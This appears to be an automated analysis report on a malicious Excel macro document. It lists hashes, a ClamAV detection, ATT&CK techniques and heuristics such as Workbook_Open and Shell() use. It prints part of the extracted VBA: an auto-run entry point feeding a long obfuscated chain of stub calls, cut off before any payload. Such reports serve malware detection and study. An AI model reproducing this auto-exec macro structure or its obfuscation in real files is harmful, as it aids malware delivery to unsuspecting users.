Office (OLE) malware analysis — malicious · bb3e5959a76a82db

MALICIOUS

Office (OLE)

77.5 KB Created: 2018-03-31 15:04:22 Authoring application: Microsoft Excel First seen: 2018-09-04

MD5: a8cbb273e4d14030c8f24a1e397a140b SHA-1: 794cae2302ff629560898cf6d7d9cfe88c4e577f SHA-256: bb3e5959a76a82db52840c4c03ae2d1e766b834553cfb53ff6123331f0be5d12

228 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1059 Command and Scripting Interpreter

The file is an Excel spreadsheet containing a Workbook_Open VBA macro. This macro utilizes the Shell() function, indicating an attempt to execute arbitrary code. The macro's structure suggests it is designed to download and execute a second-stage payload, a common technique for malware delivery. The presence of the ClamAV detection 'Xls.Malware.Valyria-10036514-0' further supports its malicious nature.

Heuristics 6

ClamAV: Xls.Malware.Valyria-10036514-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Xls.Malware.Valyria-10036514-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Workbook_Open macro high OLE_VBA_WBOPEN

Workbook_Open macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Environ() call (env variable access) low OLE_VBA_ENVIRON

Environ() call (env variable access)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 16929 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	16929 bytes
SHA-256: `51d0fe75693e20140b774e65acc2f1f995e272c53d4483ba7edcd527a58bb08f`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "TrustMind1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "TrustMind" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Option Explicit Static Sub wOrkboOk_open(): Call qEytV: End Sub Static Sub qEytV() Call UHwAT End Sub Static Sub UHwAT() Call xLvIR End Sub Static Sub xLvIR() Call bOtPQ End Sub Static Sub bOtPQ() Call FRrXO End Sub Static Function FRrXO() As Currency Call jUpeM End Function Static Function jUpeM() As Boolean Call zDeVg End Function Static Function zDeVg() As Object Call cGcde End Function Static Function cGcde() As Integer Call GJakd End Function Static Function GJakd() As String Call kNZrb End Function Static Function kNZrb() As Currency Call OQXzZ End Function Static Sub OQXzZ() Call sTVGX End Sub Static Sub sTVGX() Call VWTOV End Sub Private Sub VWTOV() Call lFIFq End Sub Private Function lFIFq() As Integer Call PIGMo End Function Private Function PIGMo() As String Call LxKgZ End Function Private Function LxKgZ() As Variant Call XDwjB End Function Static Function XDwjB() As String Call VoZWz End Function Static Function VoZWz() As Integer Call htLZa End Function Private Function htLZa() Call tzycC End Function Static Function tzycC() As Integer Call rkbOA End Function Static Function rkbOA() As Object Call DqNRc End Function Private Function DqNRc() As Single Call QwzUE End Function Static Function QwzUE() As Single Call cCmXg End Function Static Sub cCmXg() Call rpIoX End Sub Private Sub rpIoX() Call Duurz End Sub Static Sub Duurz() Call PAgub End Sub Static Sub PAgub() Call NlKgZ End Sub Private Sub NlKgZ() Call ZrwjB End Sub Static Sub ZrwjB() Call lximd End Sub Static Sub lximd() Call xDUpF End Sub Private Sub xDUpF() Call voycD End Sub Static Sub voycD() Call Hukff End Sub Static Sub Hukff() Call TAWiH End Sub Private Sub TAWiH() Call RlAUF End Sub Static Function RlAUF() As Object Call drmXh End Function Static Function drmXh() As Single Call pwYaJ End Function Static Function pwYaJ() As Single Call BCKdl End Function Static Function BCKdl() As Date Call AnoQj End Function Static Function AnoQj() As Boolean Call MtaTL End Function Static Function MtaTL() As Boolean Call YzMWm End Function Static Function YzMWm() As Byte Call kFyZO End Function Static Function kFyZO() As Double Call iqcLM End Function Static Function iqcLM() As Currency Call uwOOo End Function Static Function uwOOo() As Long Call GCARQ End Function Static Function GCARQ() As String Call EneEO End Function Static Function EneEO() As Long Call QsQHq End Function Static Function QsQHq() As Variant Call cyCKS End Function Private Function cyCKS() As Integer Call oEoNu End Function Static Sub oEoNu() Call mpSzs End Sub Static Function mpSzs() Call yvECU End Function Private Function yvECU() As Single Call KBqFw End Function Static Sub KBqFw() Call JmUsu End Sub Static Sub JmUsu() Call VsGvW End Sub Private Sub VsGvW() Call hysyy End Sub Static Sub hysyy() Call tEeBZ End Sub Static Sub tEeBZ() Call FgWcZ End Sub Sub FgWcZ() Call PuYSm End Sub Sub PuYSm() Call MnSrV End Sub Function MnSrV() As Date Call JfMRE End Function Sub JfMRE() Call UtOGR End Sub Private Function UtOGR() As Variant Call RmIfB End Function Sub RmIfB() Call OfCFk End Sub Static Sub OfCFk() Call YtEux End Sub Function YtEux() As Byte Call VlyUg End Function Static Sub VlyUg() Call SestP End Sub Function SestP() Call dsuic End Function Function dsuic() As Integer Call aloIM End Function Fun ... (truncated)

SHA-256: 51d0fe75693e20140b774e65acc2f1f995e272c53d4483ba7edcd527a58bb08f

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "TrustMind1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "TrustMind"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Static Sub wOrkboOk_open(): Call qEytV: End Sub
Static Sub qEytV()
Call UHwAT
End Sub
Static Sub UHwAT()
Call xLvIR
End Sub
Static Sub xLvIR()
Call bOtPQ
End Sub
Static Sub bOtPQ()
Call FRrXO
End Sub
Static Function FRrXO() As Currency
Call jUpeM
End Function
Static Function jUpeM() As Boolean
Call zDeVg
End Function
Static Function zDeVg() As Object
Call cGcde
End Function
Static Function cGcde() As Integer
Call GJakd
End Function
Static Function GJakd() As String
Call kNZrb
End Function
Static Function kNZrb() As Currency
Call OQXzZ
End Function
Static Sub OQXzZ()
Call sTVGX
End Sub
Static Sub sTVGX()
Call VWTOV
End Sub
Private Sub VWTOV()
Call lFIFq
End Sub
Private Function lFIFq() As Integer
Call PIGMo
End Function
Private Function PIGMo() As String
Call LxKgZ
End Function
Private Function LxKgZ() As Variant
Call XDwjB
End Function
Static Function XDwjB() As String
Call VoZWz
End Function
Static Function VoZWz() As Integer
Call htLZa
End Function
Private Function htLZa()
Call tzycC
End Function
Static Function tzycC() As Integer
Call rkbOA
End Function
Static Function rkbOA() As Object
Call DqNRc
End Function
Private Function DqNRc() As Single
Call QwzUE
End Function
Static Function QwzUE() As Single
Call cCmXg
End Function
Static Sub cCmXg()
Call rpIoX
End Sub
Private Sub rpIoX()
Call Duurz
End Sub
Static Sub Duurz()
Call PAgub
End Sub
Static Sub PAgub()
Call NlKgZ
End Sub
Private Sub NlKgZ()
Call ZrwjB
End Sub
Static Sub ZrwjB()
Call lximd
End Sub
Static Sub lximd()
Call xDUpF
End Sub
Private Sub xDUpF()
Call voycD
End Sub
Static Sub voycD()
Call Hukff
End Sub
Static Sub Hukff()
Call TAWiH
End Sub
Private Sub TAWiH()
Call RlAUF
End Sub
Static Function RlAUF() As Object
Call drmXh
End Function
Static Function drmXh() As Single
Call pwYaJ
End Function
Static Function pwYaJ() As Single
Call BCKdl
End Function
Static Function BCKdl() As Date
Call AnoQj
End Function
Static Function AnoQj() As Boolean
Call MtaTL
End Function
Static Function MtaTL() As Boolean
Call YzMWm
End Function
Static Function YzMWm() As Byte
Call kFyZO
End Function
Static Function kFyZO() As Double
Call iqcLM
End Function
Static Function iqcLM() As Currency
Call uwOOo
End Function
Static Function uwOOo() As Long
Call GCARQ
End Function
Static Function GCARQ() As String
Call EneEO
End Function
Static Function EneEO() As Long
Call QsQHq
End Function
Static Function QsQHq() As Variant
Call cyCKS
End Function
Private Function cyCKS() As Integer
Call oEoNu
End Function
Static Sub oEoNu()
Call mpSzs
End Sub
Static Function mpSzs()
Call yvECU
End Function
Private Function yvECU() As Single
Call KBqFw
End Function
Static Sub KBqFw()
Call JmUsu
End Sub
Static Sub JmUsu()
Call VsGvW
End Sub
Private Sub VsGvW()
Call hysyy
End Sub
Static Sub hysyy()
Call tEeBZ
End Sub
Static Sub tEeBZ()
Call FgWcZ
End Sub
Sub FgWcZ()
Call PuYSm
End Sub
Sub PuYSm()
Call MnSrV
End Sub
Function MnSrV() As Date
Call JfMRE
End Function
Sub JfMRE()
Call UtOGR
End Sub
Private Function UtOGR() As Variant
Call RmIfB
End Function
Sub RmIfB()
Call OfCFk
End Sub
Static Sub OfCFk()
Call YtEux
End Sub
Function YtEux() As Byte
Call VlyUg
End Function
Static Sub VlyUg()
Call SestP
End Sub
Function SestP()
Call dsuic
End Function
Function dsuic() As Integer
Call aloIM
End Function
Fun
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.